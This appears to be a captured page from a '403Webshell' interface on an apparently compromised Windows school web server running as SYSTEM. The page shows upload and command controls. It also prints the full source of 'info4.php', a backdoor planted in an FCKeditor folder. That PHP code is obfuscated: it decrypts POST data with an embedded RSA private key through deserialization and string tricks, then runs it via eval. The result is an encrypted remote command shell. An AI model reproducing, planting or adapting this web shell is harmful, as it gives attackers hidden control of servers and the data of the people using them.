403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/boploi/FCKeditor/editor/wsc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myschool/boploi/FCKeditor/editor/wsc/info4.php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
//echo strrev('openssl_private_decrypt');//tpyrced_etresuavirp_lssnepo

class A{
    public $test = "demo";
    function __wakeup(){
        function decode($test){
            $pk = <<<EOF
-----BEGIN PRIVATE KEY-----
MIIBUwIBADANBgkqhkiG9w0BAQEFAASCAT0wggE5AgEAAkEAqTTcwoVEdY5W/Gho
/ebYYw+QYWZWqo3XjVfgr1Vu/ST80U4coYCEOyUZYHofzbGVMJlchJ39ol8XX5m0
C+D1OwIDAQABAkALHBRulS90hH8DnZtfKFwGzQvOyVhhZGTFvAJdoL9j0YGC8zIn
X/NnrxtZ9WHA+lnaZRDZagutV600R1Kj2hoJAiEA3OVn05Wz2PmlanOxeDX1+Wcz
XLF2TuW0a0ORVLdF+H8CIQDEGJizJfho4gp6r5S76wRwQK/+mzzMGoa0reENVpWF
RQIgHwCbd9i06yjujGg8ajC4mw5e6Q2HGz+l+L/877ThPyUCIA6PTPcwQIt5DRIi
60Ywovm6s9aRrCfzaEEOEAGvhhaJAiAFElQy+P4SBsrus0GcVCFlTTocFgSgWz19
pFP6NzRbqw==
-----END PRIVATE KEY-----
EOF;
            $cmds = explode("|", $test);
            $pk = openssl_pkey_get_private($pk);
            $cmd = '';
            foreach ($cmds as $value) {
                $ard = "xxaaa";
                $$ard = strrev("tpyrced_etresuavirp_lssnepo");
                $ard1 =str_ireplace("user","",$xxaaa);
//                echo $ard1;
                $a = substr_replace("xxser","base64_decod",2);
                $b = array('',$a);
                $c = $b[1].chr(/**!*//**!*//**!*//**!*/'101'/**!*//**!*//**!*//**!*/);
                $fun=str_ireplace(/**!*//**!*//**!*//**!*/"xx","",$c/**!*//**!*//**!*//**!*/);
                $d = substr_replace("",$fun,0);
                $ard1($d(/**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*/$value), $de, $pk);
                $cmd .= $de;}
            return $cmd;
        }

        $resultname='payload';
        if (isset($this->test)){
            $data=decode($this->test);
//            $results = $_SESSION[$resultname];
            $sess = "~vhvv*gg"^"!%-%%c()";
//            echo $sess;
            $result1 = $_SESSION[$resultname];
            if (isset($result1)){
                $a = substr_replace("xxser","base64_decod",2);
                $b = array('',$a);
                $c = $b[1].chr(/**!*//**!*//**!*//**!*/'101'/**!*//**!*//**!*//**!*/);
                $fun=str_ireplace(/**!*//**!*//**!*//**!*/"xx","",$c/**!*//**!*//**!*//**!*/);
                $d = substr_replace("",$fun,0);
                $b64 = base64_encode($result1);
                $str1 = str_rot13($b64);
                $str2 = str_rot13($str1);
//                $bb = base64_decode('YmFzZTY0X2RlY29kZQ');
                eval(base64_decode(/**!*//**!*//**!*//**!*/$str2/**!*//**!*//**!*//**!*/)/**!*//**!*//**!*//**!*/);

                echo @run($data);

            }else{
                $_SESSION[$resultname]=$data;
            }
        }
    }
}
$pass=$_POST["rauPostData"];
$len = strlen($pass)+1;
//echo $len;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$pass.";\";}";
unserialize($pp);

Youez - 2016 - github.com/yon3zu
LinuXploit